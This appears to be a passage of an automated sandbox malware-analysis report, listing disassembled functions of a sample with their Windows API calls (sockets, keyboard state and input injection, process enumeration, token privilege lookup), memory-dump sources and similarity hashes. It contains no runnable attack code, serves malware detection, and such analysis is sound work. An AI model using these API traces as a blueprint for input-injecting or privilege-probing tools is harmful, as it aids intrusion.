                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Menu$InfoItem$Draw
                        • String ID: 0
                        • API String ID: 3227129158-4108050209
                        • Opcode ID: d72f26315049f14707ebceb258784f1b19ced946a1fd346efb247ef2f4fa9f56
                        • Instruction ID: b9b48dc4dfb0c8c3492e903804067e42f98782618e34e2fe48aa2753977b34c0
                        • Opcode Fuzzy Hash: d72f26315049f14707ebceb258784f1b19ced946a1fd346efb247ef2f4fa9f56
                        • Instruction Fuzzy Hash: 39011B32510218EFDB229F12DC44FAEBBB8FB45361F148099E849DA151DB30AAD4DF21
                        Function 0039007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ae21e96537805ad2d5cdff8e1f1d013085addd93cbb6fa200dde110e8059658
                        • Instruction ID: 7952a59a34b0024eb6c6425408a3a8e67312819ddd5da768460febf375a634dc
                        • Opcode Fuzzy Hash: 6ae21e96537805ad2d5cdff8e1f1d013085addd93cbb6fa200dde110e8059658
                        • Instruction Fuzzy Hash: D2C17D75A00216EFDB19CFA8C894EAEB7B5FF48704F218598E905EB251D731ED41CB90
                        Function 003B342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$ClearInitInitializeUninitialize
                        • String ID:
                        • API String ID: 1998397398-0
                        • Opcode ID: 6b63e10b023f0e82c2cf8a8b854266a99e546d1565623409251a04724c41db76
                        • Instruction ID: 39a6339a694947cbd09cc88ae2cd981bb1cb12736947a94883cdea2589b973c1
                        • Opcode Fuzzy Hash: 6b63e10b023f0e82c2cf8a8b854266a99e546d1565623409251a04724c41db76
                        • Instruction Fuzzy Hash: EEA169756042109FDB16DF28C485A6AB7E4FF89714F048859FA8A9F762DB30EE01CB91
                        Function 00390436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003CFC08,?), ref: 003905F0
                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003CFC08,?), ref: 00390608
                        • CLSIDFromProgID.OLE32(?,?,00000000,003CCC40,000000FF,?,00000000,00000800,00000000,?,003CFC08,?), ref: 0039062D
                        • _memcmp.LIBVCRUNTIME ref: 0039064E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FromProg$FreeTask_memcmp
                        • String ID:
                        • API String ID: 314563124-0
                        • Opcode ID: a30ef32ad6bd7fb85104252263d7dc0ac8a43f6c8eb903290f48e436199a26b6
                        • Instruction ID: 0287adb3b0a8273f18655b74248f4e2e641db73bac277d11af275b843eaba305
                        • Opcode Fuzzy Hash: a30ef32ad6bd7fb85104252263d7dc0ac8a43f6c8eb903290f48e436199a26b6
                        • Instruction Fuzzy Hash: 7E81F675A00209EFCF05DF94C984EEEB7B9FF89315F214598E506AB250DB71AE06CB60
                        Function 00371391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: b84fdce10d1dcad321e00ab847630717fe4d71d23673e7a102a4a0aad89472c3
                        • Instruction ID: 6041e57726239dbaba713a191d0e20426d6defc1c0e24752aac5c2629aff34e0
                        • Opcode Fuzzy Hash: b84fdce10d1dcad321e00ab847630717fe4d71d23673e7a102a4a0aad89472c3
                        • Instruction Fuzzy Hash: B6415C77A00100ABDB376BBE8C46AAE3AB9EF42370F15C625F81DDB191E67848419361
                        Function 003C6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(014BEA18,?), ref: 003C62E2
                        • ScreenToClient.USER32(?,?), ref: 003C6315
                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 003C6382
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        • Opcode ID: a6c4caa13c92188a6ac2ad0df4a0ee7f031a9f50a77a94f12447b201b0524d0a
                        • Instruction ID: 4f229f8bb5c3152e83d1f8d0a09c0df0e7c9880e91dd02abd3c4c9fe36d8b9bf
                        • Opcode Fuzzy Hash: a6c4caa13c92188a6ac2ad0df4a0ee7f031a9f50a77a94f12447b201b0524d0a
                        • Instruction Fuzzy Hash: EA512874A00249AFCB12DF68D981EAE7BB5EB85360F11816DF815DB2A1D730ED81CB50
                        Function 003B1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 003B1AFD
                        • WSAGetLastError.WSOCK32 ref: 003B1B0B
                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003B1B8A
                        • WSAGetLastError.WSOCK32 ref: 003B1B94
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast$socket
                        • String ID:
                        • API String ID: 1881357543-0
                        • Opcode ID: a72fa48615186b59f189936bf2c316f89373f2c531d6e7cfb210b72e89ccf3dc
                        • Instruction ID: 07ac6be2a5e29c12fe5d4e7674b787a493be236ba31983b77a861808f7381009
                        • Opcode Fuzzy Hash: a72fa48615186b59f189936bf2c316f89373f2c531d6e7cfb210b72e89ccf3dc
                        • Instruction Fuzzy Hash: 4441D074600200AFE722EF24C896F6A77E5AB44718F54C44CFA1A9F7D2D772ED418B90
                        Function 0036B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9a638526fe37b4432196e789eb32d7c35dc50707121ee435eec43fd61e11d368
                        • Instruction ID: 5d371bf01c63108c4d131a37dc13f0b10445012ff5e954affca1449b54e20483
                        • Opcode Fuzzy Hash: 9a638526fe37b4432196e789eb32d7c35dc50707121ee435eec43fd61e11d368
                        • Instruction Fuzzy Hash: 28413876A00314AFD727AF38CC41BAABBA9EF84710F10C52AF546DF692D77199418B80
                        Function 003A56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003A5783
                        • GetLastError.KERNEL32(?,00000000), ref: 003A57A9
                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003A57CE
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003A57FA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: 19a8504edf2f6c50d4cc1ac35020d059488f5fd39784ec14cb735979ac2962ec
                        • Instruction ID: 327de44f164d823fab64d5e995d4a68a861ff5bf2da3962d56f0585643aeb1d4
                        • Opcode Fuzzy Hash: 19a8504edf2f6c50d4cc1ac35020d059488f5fd39784ec14cb735979ac2962ec
                        • Instruction Fuzzy Hash: 3D411C3A600610DFDB26DF15C484A19BBE5EF4A720F198488E84AAF362CB35FD00CB91
                        Function 0036D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00356D71,00000000,00000000,003582D9,?,003582D9,?,00000001,00356D71,?,00000001,003582D9,003582D9), ref: 0036D910
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0036D999
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0036D9AB
                        • __freea.LIBCMT ref: 0036D9B4
                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                        • String ID:
                        • API String ID: 2652629310-0
                        • Opcode ID: c24c39175d5dffa5880bdb20348a379384826065f72090ec39f2548dc30fbdda
                        • Instruction ID: 8d628887c00fc4b98165a23cb6f0c892c5b4c72468bf6b198b5339dbb5599a8c
                        • Opcode Fuzzy Hash: c24c39175d5dffa5880bdb20348a379384826065f72090ec39f2548dc30fbdda
                        • Instruction Fuzzy Hash: 6431B072A0020AABDF269F65DC45EAF7BA9EB41310F068168FC04DB154EB35DD54CB90
                        Function 003C52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 003C5352
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C5375
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C5382
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C53A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LongWindow$InvalidateMessageRectSend
                        • String ID:
                        • API String ID: 3340791633-0
                        • Opcode ID: 1380f4b4a5e77297b758dc1273bbfa58cf2a940b40f424be2b8ce9778ad232e3
                        • Instruction ID: 74c20a7524c8d86ffe04e95534d223d750b770a8b269ad625a114295bc856d78
                        • Opcode Fuzzy Hash: 1380f4b4a5e77297b758dc1273bbfa58cf2a940b40f424be2b8ce9778ad232e3
                        • Instruction Fuzzy Hash: 7931B038B55A88AFEB339E14CC45FE87769AB04390F59410AFA11D62E1C7B0BDC09B41
                        Function 0039AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0039ABF1
                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0039AC0D
                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0039AC74
                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0039ACC6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: e1c6819ac7d299b80c0e73a400b88580ae774e7473eb7648a0d936d82729d169
                        • Instruction ID: 21afedfea06e8f520edcd6008992c66a827fa43bb577a5806e30657b10680d71
                        • Opcode Fuzzy Hash: e1c6819ac7d299b80c0e73a400b88580ae774e7473eb7648a0d936d82729d169
                        • Instruction Fuzzy Hash: B1313970A04B186FFF37CB698C04BFA7BA9AB85311F04471AE485DA1D0C37499818BD2
                        Function 003C7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                        Download Yara Rule
                        APIs
                        • ClientToScreen.USER32(?,?), ref: 003C769A
                        • GetWindowRect.USER32(?,?), ref: 003C7710
                        • PtInRect.USER32(?,?,003C8B89), ref: 003C7720
                        • MessageBeep.USER32(00000000), ref: 003C778C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: 1ebf09134b8824c71b61af82156d8b4c9a27177ecb459c872a80b97b1b0bf641
                        • Instruction ID: 8853ca371687360ea9dc42a61dea68c52461c0ef7ca459e99e6d3437f1286628
                        • Opcode Fuzzy Hash: 1ebf09134b8824c71b61af82156d8b4c9a27177ecb459c872a80b97b1b0bf641
                        • Instruction Fuzzy Hash: A2417875A092189FCB12DF68C994FA9B7F5BB49354F1A80ACE814EB261C730ED41CF90
                        Function 003C16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32 ref: 003C16EB
                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                        • GetCaretPos.USER32(?), ref: 003C16FF
                        • ClientToScreen.USER32(00000000,?), ref: 003C174C
                        • GetForegroundWindow.USER32 ref: 003C1752
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        • Opcode ID: 9f848b59ad7cc6362cd0cc167655cebade54c9d136c934e9b351ffae2ac5fe88
                        • Instruction ID: d05d3caa42a03390d0c504ba2700c006c6276f29784361a6ee7883597e723079
                        • Opcode Fuzzy Hash: 9f848b59ad7cc6362cd0cc167655cebade54c9d136c934e9b351ffae2ac5fe88
                        • Instruction Fuzzy Hash: 06313075D00149AFCB05EFA9C8C5DAEB7FDEF49304B5080A9E415EB212D631AE45CFA0
                        Function 0039D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0039D501
                        • Process32FirstW.KERNEL32(00000000,?), ref: 0039D50F
                        • Process32NextW.KERNEL32(00000000,?), ref: 0039D52F
                        • CloseHandle.KERNEL32(00000000), ref: 0039D5DC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 2958f66433327893670e947a1f5900f4dda3f20c383c09ce3cb3dd5908d72421
                        • Instruction ID: c0eec102c60e0781f6519c89cc481415bd8f4bdffa4fb902937f28755496a902
                        • Opcode Fuzzy Hash: 2958f66433327893670e947a1f5900f4dda3f20c383c09ce3cb3dd5908d72421
                        • Instruction Fuzzy Hash: 133193711083009FD702EF54C882AAFBBE8EF99354F14092DF5858A1A1EB71A949CB92
                        Function 003C8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • GetCursorPos.USER32(?), ref: 003C9001
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00387711,?,?,?,?,?), ref: 003C9016
                        • GetCursorPos.USER32(?), ref: 003C905E
                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00387711,?,?,?), ref: 003C9094
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                        • String ID:
                        • API String ID: 2864067406-0
                        • Opcode ID: 7d0cd54aade6ab70e29e88b7663b265cc0d3c2dc00d5de8daee5f15982484d8a
                        • Instruction ID: e47351993fde7330da3ce92135e4dbd8e26b6a6fc3ae653566620ce078e35e70
                        • Opcode Fuzzy Hash: 7d0cd54aade6ab70e29e88b7663b265cc0d3c2dc00d5de8daee5f15982484d8a
                        • Instruction Fuzzy Hash: 1A218336600028EFDB168F95CC58FFA7BB9EF49350F1540AAF5059B261C731AD50DB60
                        Function 0039D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNEL32(?,003CCB68), ref: 0039D2FB
                        • GetLastError.KERNEL32 ref: 0039D30A
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0039D319
                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003CCB68), ref: 0039D376
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast
                        • String ID:
                        • API String ID: 2267087916-0
                        • Opcode ID: d4ffe0d13b15ea6bafa087f31f56e7d90e32d7183337bb29447e168bdc038c8d
                        • Instruction ID: 5c0115bedb4d847c52ad2689509a157380ad01b8d9e9e94939d167c4be403e82
                        • Opcode Fuzzy Hash: d4ffe0d13b15ea6bafa087f31f56e7d90e32d7183337bb29447e168bdc038c8d
                        • Instruction Fuzzy Hash: CB219F74508201DF8B02DF28C8C28AAB7E8AF56365F104A1DF499C72A1D731DD46CB93
                        Function 00391571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00391014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0039102A
                          • Part of subcall function 00391014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00391036
                          • Part of subcall function 00391014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391045
                          • Part of subcall function 00391014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0039104C
                          • Part of subcall function 00391014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391062
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003915BE
                        • _memcmp.LIBVCRUNTIME ref: 003915E1
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00391617
